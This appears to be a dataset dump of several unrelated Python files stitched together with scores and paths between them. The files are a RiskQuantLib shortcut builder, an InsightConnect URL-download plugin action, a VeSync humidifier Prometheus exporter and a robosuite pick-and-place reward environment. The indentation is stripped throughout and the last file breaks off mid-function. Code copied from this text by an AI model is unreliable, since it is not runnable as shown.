clearShortcut(targetProjectPath:str='') is a function to clear all registration of class paths.
To simplify usage of class, a shortcut will be inserted to RiskQuantLib.module for every auto-built instrument class.
After calling this function, these shortcuts will be removed, but the original source files still exist.
Parameters
----------
targetProjectPath :str
The RiskQuantLib project path where you want to remove all instrument class shortcuts.
Returns
-------
None
"""
projectPath = os.path.abspath(__file__).split('RiskQuantLib'+os.sep+'Build'+os.sep+'buildShortcut.py')[0]
if targetProjectPath == '':
path = projectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
else:
path = targetProjectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
# write shortcut path
with open(path, 'r') as f:
content = f.read()
if content.find('#-<moduleImportBegin>') == -1 or content.find('#-<moduleImportEnd>') == -1:
print("Source file must have a #-<Begin> and #-<End> tag to be built")
exit(-1)
former = content.split('#-<moduleImportBegin>')[0]
ender = content.split('#-<moduleImportEnd>')[-1]
newContent = former + '#-<moduleImportBegin>\n#-<moduleImportEnd>' + ender
with open(path, 'w') as f:
f.truncate() # clear all contents
f.write(newContent.strip(' ').strip('\t\n'))
def commitShortcut(psb:pythonScriptBuilder,targetProjectPath:str):
"""
commitShortcut(psb:pythonScriptBuilder,targetProjectPath:str) is a function to commit the change
of shortcut files. It makes modification to RiskQuantLib.module.
Parameters
----------
psb : pythonScriptBuilder
A pythonScriptBuilder object, contains the source code of shortcuts map relation.
targetProjectPath : str
The RiskQuantLib project path where you want to commit shortcut change.
Returns
-------
None
"""
projectPath = os.path.abspath(__file__).split('RiskQuantLib'+os.sep+'Build'+os.sep+'buildShortcut.py')[0]
if targetProjectPath == '':
path = projectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
else:
path = targetProjectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
# write shortcut path
with open(path, 'r') as f:
content = f.read()
if content.find('#-<moduleImportBegin>') == -1 or content.find('#-<moduleImportEnd>') == -1:
print("Source file must have a #-<Begin> and #-<End> tag to be built")
exit(-1)
former = content.split('#-<moduleImportBegin>')[0]
ender = content.split('#-<moduleImportEnd>')[-1]
newContent = former + '#-<moduleImportBegin>\n'+psb.importLibrary+'#-<moduleImportEnd>' + ender
with open(path, 'w') as f:
f.truncate() # clear all contents
f.write(newContent.strip(' ').strip('\t\n'))
def buildShortcut(instrumentNameList:list):
"""
buildShortcut(instrumentNameList:list) is the function to generate source code of shortcut map.
It joins class name to class import path, making it easy to use instrument class.
Parameters
----------
instrumentNameList : list
The instruments whose shortcut you want to add to RiskQuantLib.module.
Returns
-------
psb : pythonScriptBuilder
A pythonScriptBuilder object contains map relation from instrument name to import path.
"""
c_instrumentNameList = [i[0].capitalize()+i[1:] for i in instrumentNameList]
psb = pythonScriptBuilder()
import RiskQuantLib.Build.pathObj as POJ
importlib.reload(POJ)
RQLpathObj = POJ.pathObj()
pathWaitedToBeAdded = [convertPathToImportPath(RQLpathObj.listPathDict[i]) for i in c_instrumentNameList]
[psb.setImport(classPath,'',True,className+'List,'+className) for classPath,className in zip(pathWaitedToBeAdded,instrumentNameList)]
return psb | 0.417153 | 0.194158 |
import insightconnect_plugin_runtime
from insightconnect_plugin_runtime.exceptions import PluginException
from komand_get_url.util import constants
from komand_get_url.util.utils import Utils
from .schema import GetFileInput, GetFileOutput, Input, Output, Component
class GetFile(insightconnect_plugin_runtime.Action):
def __init__(self):
super(self.__class__, self).__init__(
name="get_file",
description=Component.DESCRIPTION,
input=GetFileInput(),
output=GetFileOutput(),
)
self.utils = Utils(action=self)
def run(self, params={}):
url = params.get(Input.URL)
checksum = params.get(Input.CHECKSUM)
timeout = params.get(Input.TIMEOUT, constants.DEFAULT_TIMEOUT)
is_verify = params.get(Input.IS_VERIFY, True)
user_agent = params.get(Input.USER_AGENT, constants.DEFAULT_USER_AGENT)
url_object, meta = self.utils.check_prefix_and_download(url, is_verify, user_agent, timeout)
cache_file = constants.DEFAULT_CACHE_FOLDER + meta.get("file")
if url_object:
contents = url_object.read().decode(constants.DEFAULT_ENCODING, "replace")
# Optional integrity check of file
if checksum and not insightconnect_plugin_runtime.helper.check_hashes(contents, checksum):
self.logger.error("GetFile: File Checksum Failed")
raise PluginException(
cause="Checksums between the downloaded file and provided checksum did not match.",
assistance="Verify the file you meant to download and the checksum you provided are correct.",
)
# Write etag and last modified to cache
self.utils.create_url_meta_file(meta, url_object)
# Write URL file contents to cache
self.utils.write_contents_to_cache(cache_file, contents)
# Check URL status code and return file contents
if not url_object.code or 200 <= url_object.code <= 299:
return {
Output.BYTES: insightconnect_plugin_runtime.helper.encode_string(contents).decode(
constants.DEFAULT_ENCODING
),
Output.STATUS_CODE: url_object.code or 200,
}
# When the download fails or file is not modified
else:
# Attempt to return file from cache if available
self.logger.info(f"GetURL: File not modified: {url}")
if insightconnect_plugin_runtime.helper.check_cachefile(cache_file):
self.logger.info(f"GetURL: File returned from cache: {cache_file}")
return {
Output.BYTES: insightconnect_plugin_runtime.helper.encode_file(cache_file).decode(
constants.DEFAULT_ENCODING
),
Output.STATUS_CODE: 200,
}
# If file hasn't been returned then we fail
self.logger.info(f"GetURL: Download failed for {url}")
raise PluginException(preset=PluginException.Preset.UNKNOWN, assistance=f"Download failed for {url}") | plugins/get_url/komand_get_url/actions/get_file/action.py | import insightconnect_plugin_runtime
from insightconnect_plugin_runtime.exceptions import PluginException
from komand_get_url.util import constants
from komand_get_url.util.utils import Utils
from .schema import GetFileInput, GetFileOutput, Input, Output, Component
class GetFile(insightconnect_plugin_runtime.Action):
def __init__(self):
super(self.__class__, self).__init__(
name="get_file",
description=Component.DESCRIPTION,
input=GetFileInput(),
output=GetFileOutput(),
)
self.utils = Utils(action=self)
def run(self, params={}):
url = params.get(Input.URL)
checksum = params.get(Input.CHECKSUM)
timeout = params.get(Input.TIMEOUT, constants.DEFAULT_TIMEOUT)
is_verify = params.get(Input.IS_VERIFY, True)
user_agent = params.get(Input.USER_AGENT, constants.DEFAULT_USER_AGENT)
url_object, meta = self.utils.check_prefix_and_download(url, is_verify, user_agent, timeout)
cache_file = constants.DEFAULT_CACHE_FOLDER + meta.get("file")
if url_object:
contents = url_object.read().decode(constants.DEFAULT_ENCODING, "replace")
# Optional integrity check of file
if checksum and not insightconnect_plugin_runtime.helper.check_hashes(contents, checksum):
self.logger.error("GetFile: File Checksum Failed")
raise PluginException(
cause="Checksums between the downloaded file and provided checksum did not match.",
assistance="Verify the file you meant to download and the checksum you provided are correct.",
)
# Write etag and last modified to cache
self.utils.create_url_meta_file(meta, url_object)
# Write URL file contents to cache
self.utils.write_contents_to_cache(cache_file, contents)
# Check URL status code and return file contents
if not url_object.code or 200 <= url_object.code <= 299:
return {
Output.BYTES: insightconnect_plugin_runtime.helper.encode_string(contents).decode(
constants.DEFAULT_ENCODING
),
Output.STATUS_CODE: url_object.code or 200,
}
# When the download fails or file is not modified
else:
# Attempt to return file from cache if available
self.logger.info(f"GetURL: File not modified: {url}")
if insightconnect_plugin_runtime.helper.check_cachefile(cache_file):
self.logger.info(f"GetURL: File returned from cache: {cache_file}")
return {
Output.BYTES: insightconnect_plugin_runtime.helper.encode_file(cache_file).decode(
constants.DEFAULT_ENCODING
),
Output.STATUS_CODE: 200,
}
# If file hasn't been returned then we fail
self.logger.info(f"GetURL: Download failed for {url}")
raise PluginException(preset=PluginException.Preset.UNKNOWN, assistance=f"Download failed for {url}") | 0.549399 | 0.069258 |
# To run this you probably need to:
# pip install pyvesync
# pip install python-dotenv
import os
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from pyvesync import VeSync
from dotenv import load_dotenv
load_dotenv()
# Setup VeSync, login, and get initial device info
vesync = VeSync(os.getenv("VESYNC_USERNAME"), os.getenv("VESYNC_PASSWORD"))
vesync.login()
vesync.update()
humidifier = json.loads(vesync.fans[0].displayJSON())
# Setup server response
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
if (self.path == "/metrics"):
vesync.update()
humidifier = json.loads(vesync.fans[0].displayJSON())
cid = humidifier["CID"]
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("# HELP vesync_humidity_ratio The current humidity.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_humidity_ratio gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_humidity_ratio{{CID=\"{cid}\"}} {int(humidifier['Humidity']) / 100}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_target_humidity_ratio The target humidity.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_target_humidity_ratio gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_target_humidity_ratio{{CID=\"{cid}\"}} {int(humidifier['Auto Target Humidity']) / 100}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mist_level The current mist level.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mist_level gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mist_level{{CID=\"{cid}\"}} {humidifier['Mist Level']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mist_virtual_level The current mist virtual level.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mist_virtual_level gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mist_virtual_level{{CID=\"{cid}\"}} {humidifier['Mist Virtual Level']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_night_light_brightness The night light brightness.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_night_light_brightness gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_night_light_brightness{{CID=\"{cid}\"}} {humidifier['Night Light Brightness']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_status Device is on.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_status gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_status{{CID=\"{cid}\"}} {1 if humidifier['Status'] == 'on' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_online Device is online.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_online gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_online{{CID=\"{cid}\"}} {1 if humidifier['Online'] == 'online' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mode_auto Auto mode enabled.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mode_auto gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mode_auto{{CID=\"{cid}\"}} {1 if humidifier['Mode'] == 'auto' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_water_lacks Water level low.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_water_lacks gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_water_lacks{{CID=\"{cid}\"}} {1 if humidifier['Water Lacks'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_humidity_high Humidity too high.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_humidity_high gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_humidity_high{{CID=\"{cid}\"}} {1 if humidifier['Humidity High'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_water_tank_lifted Water tank missing.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_water_tank_lifted gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_water_tank_lifted{{CID=\"{cid}\"}} {1 if humidifier['Water Tank Lifted'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_display_enabled Display is enabled.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_display_enabled gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_display_enabled{{CID=\"{cid}\"}} {1 if humidifier['Display'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_automatic_stop_reach_target Automatic stop reach target?\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_automatic_stop_reach_target gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_automatic_stop_reach_target{{CID=\"{cid}\"}} {1 if humidifier['Automatic Stop Reach Target'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_automatic_stop Automatic stop?\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_automatic_stop gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_automatic_stop{{CID=\"{cid}\"}} {1 if humidifier['Automatic Stop'] == True else 0}\n", "utf-8"))
else:
self.send_response(501)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("501 Not Implemented", "utf-8"))
# Start server
server = HTTPServer((os.getenv("HOSTNAME"), int(os.getenv("PORT"))), MyServer)
print("Server started http://%s:%s" % (os.getenv("HOSTNAME"), os.getenv("PORT")))
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
print("Server stopped.") | pro-ve-pro.py |
# To run this you probably need to:
# pip install pyvesync
# pip install python-dotenv
import os
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from pyvesync import VeSync
from dotenv import load_dotenv
load_dotenv()
# Setup VeSync, login, and get initial device info
vesync = VeSync(os.getenv("VESYNC_USERNAME"), os.getenv("VESYNC_PASSWORD"))
vesync.login()
vesync.update()
humidifier = json.loads(vesync.fans[0].displayJSON())
# Setup server response
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
if (self.path == "/metrics"):
vesync.update()
humidifier = json.loads(vesync.fans[0].displayJSON())
cid = humidifier["CID"]
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("# HELP vesync_humidity_ratio The current humidity.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_humidity_ratio gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_humidity_ratio{{CID=\"{cid}\"}} {int(humidifier['Humidity']) / 100}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_target_humidity_ratio The target humidity.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_target_humidity_ratio gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_target_humidity_ratio{{CID=\"{cid}\"}} {int(humidifier['Auto Target Humidity']) / 100}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mist_level The current mist level.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mist_level gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mist_level{{CID=\"{cid}\"}} {humidifier['Mist Level']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mist_virtual_level The current mist virtual level.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mist_virtual_level gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mist_virtual_level{{CID=\"{cid}\"}} {humidifier['Mist Virtual Level']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_night_light_brightness The night light brightness.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_night_light_brightness gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_night_light_brightness{{CID=\"{cid}\"}} {humidifier['Night Light Brightness']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_status Device is on.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_status gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_status{{CID=\"{cid}\"}} {1 if humidifier['Status'] == 'on' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_online Device is online.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_online gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_online{{CID=\"{cid}\"}} {1 if humidifier['Online'] == 'online' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mode_auto Auto mode enabled.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mode_auto gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mode_auto{{CID=\"{cid}\"}} {1 if humidifier['Mode'] == 'auto' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_water_lacks Water level low.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_water_lacks gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_water_lacks{{CID=\"{cid}\"}} {1 if humidifier['Water Lacks'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_humidity_high Humidity too high.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_humidity_high gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_humidity_high{{CID=\"{cid}\"}} {1 if humidifier['Humidity High'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_water_tank_lifted Water tank missing.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_water_tank_lifted gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_water_tank_lifted{{CID=\"{cid}\"}} {1 if humidifier['Water Tank Lifted'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_display_enabled Display is enabled.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_display_enabled gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_display_enabled{{CID=\"{cid}\"}} {1 if humidifier['Display'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_automatic_stop_reach_target Automatic stop reach target?\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_automatic_stop_reach_target gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_automatic_stop_reach_target{{CID=\"{cid}\"}} {1 if humidifier['Automatic Stop Reach Target'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_automatic_stop Automatic stop?\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_automatic_stop gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_automatic_stop{{CID=\"{cid}\"}} {1 if humidifier['Automatic Stop'] == True else 0}\n", "utf-8"))
else:
self.send_response(501)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("501 Not Implemented", "utf-8"))
# Start server
server = HTTPServer((os.getenv("HOSTNAME"), int(os.getenv("PORT"))), MyServer)
print("Server started http://%s:%s" % (os.getenv("HOSTNAME"), os.getenv("PORT")))
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
print("Server stopped.") | 0.276397 | 0.051942 |
import numpy as np
from composition.arenas.pick_place_arena import PickPlaceArena
from composition.env.compositional_env import CompositionalEnv
from composition.tasks.task_utils import dot_product_angle
import robosuite.utils.transform_utils as T
from robosuite.utils.placement_samplers import UniformRandomSampler
class PickPlaceSubtask(CompositionalEnv):
"""
This class corresponds to the pick place task for a single robot arm.
Args:
bin1_pos (3-tuple): Absolute cartesian coordinates of the bin initially holding the objects
bin2_pos (3-tuple): Absolute cartesian coordinates of the goal bin
use_object_obs (bool): if True, include object (cube) information in
the observation.
reward_scale (None or float): Scales the normalized reward function by the amount specified.
If None, environment reward remains unnormalized
reward_shaping (bool): if True, use dense rewards.
object_type (string): if provided, should be one of "milk", "bread", "cereal",
or "can". Determines which type of object will be spawned on every
environment reset. Only used if @single_object_mode is 2.
Raises:
AssertionError: [Invalid object type specified]
AssertionError: [Invalid number of robots specified]
"""
def __init__(
self,
robots,
object_type,
obstacle,
env_configuration="default",
controller_configs=None,
mount_types="default",
gripper_types="RethinkGripper",
initialization_noise=None,
use_camera_obs=True,
use_object_obs=True,
use_task_id_obs=False,
has_renderer=False,
has_offscreen_renderer=True,
render_camera="frontview",
render_collision_mesh=False,
render_visual_mesh=True,
render_gpu_device_id=-1,
control_freq=20,
horizon=1000,
ignore_done=False,
hard_reset=True,
camera_names="agentview",
camera_heights=256,
camera_widths=256,
camera_depths=False,
bin1_pos=(0.1, -0.26, 0.8),
bin2_pos=(0.1, 0.13, 0.8),
reward_scale=1.0,
reward_shaping=False,
):
self.subtask_id = 0
super().__init__(
robots,
object_type,
obstacle,
bin1_pos,
bin2_pos,
env_configuration=env_configuration,
controller_configs=controller_configs,
mount_types=mount_types,
gripper_types=gripper_types,
initialization_noise=initialization_noise,
use_camera_obs=use_camera_obs,
use_object_obs=use_object_obs,
use_task_id_obs=use_task_id_obs,
has_renderer=has_renderer,
has_offscreen_renderer=has_offscreen_renderer,
render_camera=render_camera,
render_collision_mesh=render_collision_mesh,
render_visual_mesh=render_visual_mesh,
render_gpu_device_id=render_gpu_device_id,
control_freq=control_freq,
horizon=horizon,
ignore_done=ignore_done,
hard_reset=hard_reset,
camera_names=camera_names,
camera_heights=camera_heights,
camera_widths=camera_widths,
camera_depths=camera_depths,
reward_scale=reward_scale,
reward_shaping=reward_shaping,
)
self.was_grasping = False
self.dropped_object = False
def staged_rewards(self, action):
"""
Returns staged rewards based on current physical states.
Stages consist of reaching, grasping, lifting, and hovering.
Returns:
4-tuple:
- (float) reaching reward
- (float) grasping reward
- (float) lifting reward
- (float) hovering reward
"""
reach_mult = 0.2
grasp_mult = 0.3
lift_mult = 0.5
hover_mult = 0.7
drop_mult = 0.9
r_align = 0
# reaching reward governed by distance to closest object
r_reach = 0.
if not self.object_in_bin:
# get reaching reward via minimum distance to a target object
dist = self._gripper_to_target(
gripper=self.robots[0].gripper,
target=self.object.root_body,
target_type="body",
return_distance=True,
)
r_reach = (1 - np.tanh(10.0 * dist)) * reach_mult
# grasping reward for touching any objects of interest
is_grasping = self._check_grasp(
gripper=self.robots[0].gripper,
object_geoms=[g for g in self.object.contact_geoms])
r_grasp = int(is_grasping) * grasp_mult
# lifting reward for picking up an object
r_lift = 0.
if not self.object_in_bin and r_grasp > 0.:
z_target = self.bin2_pos[2] + 0.25
object_z_loc = self.sim.data.body_xpos[self.obj_body_id, 2]
z_dist = np.abs(z_target - object_z_loc)
r_lift = grasp_mult + (1 - np.tanh(5.0 * z_dist)) * (
lift_mult - grasp_mult
)
# segment objects into left of the bins and above the bins
object_xy_loc = self.sim.data.body_xpos[self.obj_body_id, :2]
y_check = (
np.abs(object_xy_loc[1] -
self.bin2_pos[1])
< self.bin2_size[1]
)
x_check = (
np.abs(object_xy_loc[0] -
self.bin2_pos[0])
< self.bin2_size[0]
)
object_above_bin = x_check and y_check
# hover reward for getting object above bin
r_hover = 0.
r_drop = 0.
if not self.object_in_bin and r_lift > 0.45:
dist = np.linalg.norm(
self.bin2_pos[:2] - object_xy_loc
)
# objects to the left get r_lift added to hover reward,
# those on the right get max(r_lift) added (to encourage dropping)
if not object_above_bin:
r_hover = r_lift + (
1 - np.tanh(2.0 * dist)
) * (hover_mult - lift_mult)
else:
r_hover = lift_mult + (
1 - np.tanh(2.0 * dist)
) * (hover_mult - lift_mult)
if r_grasp > 0 and object_above_bin:
z_target = self.bin2_pos[2] + 0.1
object_z_loc = self.sim.data.body_xpos[self.obj_body_id, 2]
z_dist = np.maximum(object_z_loc - z_target, 0.)
r_drop = hover_mult + \
(1 - np.tanh(5.0 * z_dist)) * (drop_mult - hover_mult)
# print('is_grasping:', is_grasping, 'was_grasping:', self.was_grasping, 'gripper_pos:', self.sim.data.site_xpos[self.robots[0].eef_site_id, 2], 'target_h:', self.bin2_pos[2] + 0.1 )
# TODO: this height is arbitrary and won't work for eg milk and cereal
if (not is_grasping) and self.was_grasping and self.sim.data.site_xpos[self.robots[0].eef_site_id, 2] > self.bin2_pos[2] + 0.1:
self.dropped_object = True
self.was_grasping = is_grasping
return r_align, r_reach, r_grasp, r_lift, r_hover, r_drop
def not_in_bin(self, obj_pos):
bin_x_low = self.bin2_pos[0] - self.bin2_size[0]
bin_y_low = self.bin2_pos[1] - self.bin2_size[1]
bin_x_high = self.bin2_pos[0] + self.bin2_size[0]
bin_y_high = self.bin2_pos[1] + self.bin2_size[1]
res = True
if (
bin_x_low < obj_pos[0] < bin_x_high
and bin_y_low < obj_pos[1] < bin_y_high
and self.bin2_pos[2] < obj_pos[2] < self.bin2_pos[2] + 0.1
):
res = False
return res
def _get_placement_initializer(self):
"""
Helper function for defining placement initializer and object sampling bounds.
"""
super()._get_placement_initializer()
bin_x_low = -self.bin2_size[0] / 2
bin_y_low = -self.bin2_size[1] / 2
bin_x_high = self.bin2_size[0] / 2
bin_y_high = self.bin2_size[1] / 2
# TODO: why is this not exactly in the middle
self.placement_initializer.append_sampler(
sampler=UniformRandomSampler(
name=f"{self.visual_object.name}ObjectSampler",
mujoco_objects=self.visual_object,
x_range=[bin_x_low, bin_x_high],
y_range=[bin_y_low, bin_y_high],
rotation=0.,
rotation_axis='z',
ensure_object_boundary_in_range=False,
ensure_valid_placement=False,
reference_pos=self.bin2_pos,
z_offset=self.bin2_pos[2] - self.bin1_pos[2],
)
)
def _load_model(self):
"""
Loads an xml model, puts it in self.model
"""
# load model for table top workspace
self.mujoco_arena = PickPlaceArena(
bin1_pos=self.bin1_pos,
)
# Load model propagation
super()._load_model()
# Generate placement initializer
self._initialize_model()
self._get_placement_initializer()
def _setup_references(self):
"""
Sets up references to important components. A reference is typically an
index or a list of indices that point to the corresponding elements
in a flatten array, which is how MuJoCo stores physical simulation data.
"""
# keep track of which objects are in their corresponding bins
self.object_in_bin = False
# target locations in bin for each object type
self.target_bin_placements = np.zeros((1, 3))
# TODO: fix this once i understand why its here
# I think we can remove target bin placements
bin_x_low = self.bin2_pos[0]
bin_y_low = self.bin2_pos[1]
bin_x_low += self.bin2_size[0] / 2.
bin_y_low += self.bin2_size[1] / 2.
self.target_bin_placements[0, :] = [
bin_x_low, bin_y_low, self.bin2_pos[2]]
super()._setup_references()
def _reset_internal(self):
"""
Resets simulation internal configurations.
"""
super()._reset_internal()
self.was_grasping = False
# Set the bins to the desired position
self.sim.model.body_pos[self.sim.model.body_name2id(
"bin1")] = self.bin1_pos
self.sim.model.body_pos[self.sim.model.body_name2id(
"bin2")] = self.bin2_pos
def _check_success(self):
"""
Check if all objects have been successfully placed in their corresponding bins.
Returns:
bool: True if object is placed correctly
"""
# remember objects that are in the correct bins
gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
obj_pos = self.sim.data.body_xpos[self.obj_body_id]
dist = np.linalg.norm(gripper_site_pos - obj_pos)
r_reach = 1 - np.tanh(10.0 * dist)
# self.object_in_bin = not self.not_in_bin(obj_pos)
self.object_in_bin = bool(
(not self.not_in_bin(obj_pos)) and r_reach > 0.35)
return self.object_in_bin
def _post_action(self, action):
"""
Do any housekeeping after taking an action.
Args:
action (np.array): Action to execute within the environment
Returns:
3-tuple:
- (float) reward from the environment
- (bool) whether the current episode is completed or not
- (dict) empty dict to be filled with information by subclassed method
"""
reward = self.reward(action)
# done if number of elapsed timesteps is greater than horizon
# self.dropped_object or ((self.timestep >= self.horizon) and not self.ignore_done)
self.done = False
self.dropped_object = False
return reward, self.done, {} | compositional-rl-benchmark/composition/composition/tasks/pick_place_subtask.py | import numpy as np
from composition.arenas.pick_place_arena import PickPlaceArena
from composition.env.compositional_env import CompositionalEnv
from composition.tasks.task_utils import dot_product_angle
import robosuite.utils.transform_utils as T
from robosuite.utils.placement_samplers import UniformRandomSampler
class PickPlaceSubtask(CompositionalEnv):
"""
This class corresponds to the pick place task for a single robot arm.
Args:
bin1_pos (3-tuple): Absolute cartesian coordinates of the bin initially holding the objects
bin2_pos (3-tuple): Absolute cartesian coordinates of the goal bin
use_object_obs (bool): if True, include object (cube) information in
the observation.
reward_scale (None or float): Scales the normalized reward function by the amount specified.
If None, environment reward remains unnormalized
reward_shaping (bool): if True, use dense rewards.
object_type (string): if provided, should be one of "milk", "bread", "cereal",
or "can". Determines which type of object will be spawned on every
environment reset. Only used if @single_object_mode is 2.
Raises:
AssertionError: [Invalid object type specified]
AssertionError: [Invalid number of robots specified]
"""
def __init__(
self,
robots,
object_type,
obstacle,
env_configuration="default",
controller_configs=None,
mount_types="default",
gripper_types="RethinkGripper",
initialization_noise=None,
use_camera_obs=True,
use_object_obs=True,
use_task_id_obs=False,
has_renderer=False,
has_offscreen_renderer=True,
render_camera="frontview",
render_collision_mesh=False,
render_visual_mesh=True,
render_gpu_device_id=-1,
control_freq=20,
horizon=1000,
ignore_done=False,
hard_reset=True,
camera_names="agentview",
camera_heights=256,
camera_widths=256,
camera_depths=False,
bin1_pos=(0.1, -0.26, 0.8),
bin2_pos=(0.1, 0.13, 0.8),
reward_scale=1.0,
reward_shaping=False,
):
self.subtask_id = 0
super().__init__(
robots,
object_type,
obstacle,
bin1_pos,
bin2_pos,
env_configuration=env_configuration,
controller_configs=controller_configs,
mount_types=mount_types,
gripper_types=gripper_types,
initialization_noise=initialization_noise,
use_camera_obs=use_camera_obs,
use_object_obs=use_object_obs,
use_task_id_obs=use_task_id_obs,
has_renderer=has_renderer,
has_offscreen_renderer=has_offscreen_renderer,
render_camera=render_camera,
render_collision_mesh=render_collision_mesh,
render_visual_mesh=render_visual_mesh,
render_gpu_device_id=render_gpu_device_id,
control_freq=control_freq,
horizon=horizon,
ignore_done=ignore_done,
hard_reset=hard_reset,
camera_names=camera_names,
camera_heights=camera_heights,
camera_widths=camera_widths,
camera_depths=camera_depths,
reward_scale=reward_scale,
reward_shaping=reward_shaping,
)
self.was_grasping = False
self.dropped_object = False
def staged_rewards(self, action):
"""
Returns staged rewards based on current physical states.
Stages consist of reaching, grasping, lifting, and hovering.
Returns:
4-tuple:
- (float) reaching reward
- (float) grasping reward
- (float) lifting reward
- (float) hovering reward
"""
reach_mult = 0.2
grasp_mult = 0.3
lift_mult = 0.5
hover_mult = 0.7
drop_mult = 0.9
r_align = 0
# reaching reward governed by distance to closest object
r_reach = 0.
if not self.object_in_bin:
# get reaching reward via minimum distance to a target object
dist = self._gripper_to_target(
gripper=self.robots[0].gripper,
target=self.object.root_body,
target_type="body",
return_distance=True,
)
r_reach = (1 - np.tanh(10.0 * dist)) * reach_mult
# grasping reward for touching any objects of interest
is_grasping = self._check_grasp(
gripper=self.robots[0].gripper,
